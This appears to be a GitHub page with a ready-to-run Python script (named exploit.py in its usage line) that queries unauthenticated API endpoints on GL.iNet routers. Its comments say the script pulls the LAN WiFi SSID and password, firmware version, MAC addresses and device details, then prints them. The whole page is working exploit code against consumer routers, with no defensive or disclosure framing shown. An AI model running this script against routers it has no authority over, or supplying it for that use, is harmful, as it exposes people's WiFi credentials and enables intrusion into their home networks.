-
Notifications
You must be signed in to change notification settings - Fork 1
/
scanner.py
122 lines (105 loc) · 3.65 KB
/
scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
#!/usr/bin/env python3
#########################################################
#
# Usage: python3 exploit.py <domain/IP>
#
# Example: python3 exploit.py 192.168.8.1
#
# This script will scan a GL.iNet router for information
# available to an unauthenticated user. It will first try
# over HTTP, and HTTPS afterwards if unsuccessful.
# Multiple API endpoints will be queried, and all data is
# aggregated and printed to the screen.
#
# Output explained:
# - del: ?
# - led: ? Something about LED lights
# - led_sync: ? Something about LED lights
# - disabled: which channel (2G or 5G or neither) is disabled
# - wifi_sync: ?
# - ssid: SSID of LAN WiFi network
# - key: WiFi password for LAN network
# - encryption: LAN WiFi encryption type
# - version: GL.iNET firmware version
# - code: 0
# - model: GL.iNET model name
# - factory_mac: MAC address given by GL.iNET
# - init: If device has been setup
# - connected: If device is connected to the internet
# - configured: If device has been configured
# - firmware_user: ?
# - firmware_type: ?
# - mac: current MAC address (may be changed from factory_mac)
# - type: device type
# - name: name of the device
# - hostname: hostname of the device
# - image_url: path to custom customer logo
# - customer_name: name of the customer
# - help_url: path to custom customer help page
# - internal_version: internal version number
# - language: 2-character language code
#
#########################################################
import requests, sys
import warnings
warnings.filterwarnings("ignore")
## Get arguments
if (len(sys.argv) < 2):
print("Usage: python3 exploit.py <domain/IP>")
sys.exit(1)
url = sys.argv[1]
print("[+] Scanning http://"+url+"/...")
## Test target connection
https = False
try:
response = requests.request("GET", "http://"+url+"/", timeout=4)
except Exception as e:
print("[-] Error connecting to target: "+str(e))
print("[-] Attempting HTTPS...")
https = True
if https:
try:
print("[+] Scanning https://"+url+"/...")
response = requests.request("GET", "https://"+url+"/", verify=False, timeout=4)
except Exception as e:
print("[-] Error connecting to target: "+str(e))
sys.exit(1)
## Query endpoints
output = {}
beginning = "https://" if https else "http://"
### /api/router/mesh/status
data = "mac="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
try:
response = requests.request("POST", beginning+url+"/api/router/mesh/status", verify=False, timeout=4, data=data, headers=headers).json()
output.update(response)
except:
""
### /api/router/nologin/apinfo
try:
response = requests.request("GET", beginning+url+"/api/router/nologin/apinfo", verify=False, timeout=4).json()
output.update(response)
except:
""
### /api/router/hello
try:
response = requests.request("GET", beginning+url+"/api/router/hello", verify=False, timeout=4).json()
output.update(response)
except:
""
### /api/router/model
try:
response = requests.request("GET", beginning+url+"/api/router/model", verify=False, timeout=4).json()
output.update(response)
except:
""
### /api/router/language/get
try:
response = requests.request("GET", beginning+url+"/api/router/language/get", verify=False, timeout=4).json()
output.update(response)
except:
""
## Print results
print("[+] Scan complete. Results:")
for key in output:
print(" "+key+": "+str(output[key]))